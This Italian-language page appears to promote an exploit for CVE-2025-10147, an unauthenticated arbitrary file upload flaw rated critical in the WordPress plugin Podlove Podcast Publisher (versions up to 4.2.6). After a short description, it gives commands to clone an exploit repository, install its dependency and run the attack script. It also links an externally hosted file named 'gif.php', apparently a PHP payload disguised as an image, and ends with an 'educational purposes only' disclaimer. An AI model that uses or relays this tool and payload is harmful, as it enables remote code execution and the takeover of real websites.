
Podlove Podcast Publisher <= 4.2.6 - Caricamento arbitrario di file non autenticato
Podlove Podcast Publisher <= 4.2.6 - Caricamento Arbitrario di File Non Autenticato
Il plugin Podlove Podcast Publisher per WordPress è vulnerabile a caricamenti arbitrari di file a causa della mancanza di validazione del tipo di file nella funzione 'move_as_original_file' in tutte le versioni fino alla 4.2.6 inclusa. Ciò consente a utenti non autenticati di caricare file arbitrari sul server del sito interessato, rendendo possibile l'esecuzione di codice remoto.
CVE CVE-2025-10147 CVSS 9.8 (Critico) Data di Pubblicazione 22 settembre 2025 Ultimo Aggiornamento 23 settembre 2025 Ricercatore Arkadiusz Hydzik
git clone https://github.com/ghostpel-sec/CVE-2025-10147.git
pip install requests
python3 ghostpelsec.py
https://pub-d19c0c8b20f742b7abe6b358019ec3be.r2.dev/ghostpelsec.gif.php
Questo strumento è sviluppato ESCLUSIVAMENTE PER SCOPI EDUCATIVI per dimostrare vulnerabilità di sicurezza.
Usando questo strumento, accetti questi termini.
Resta legale, resta etico, resta al sicuro.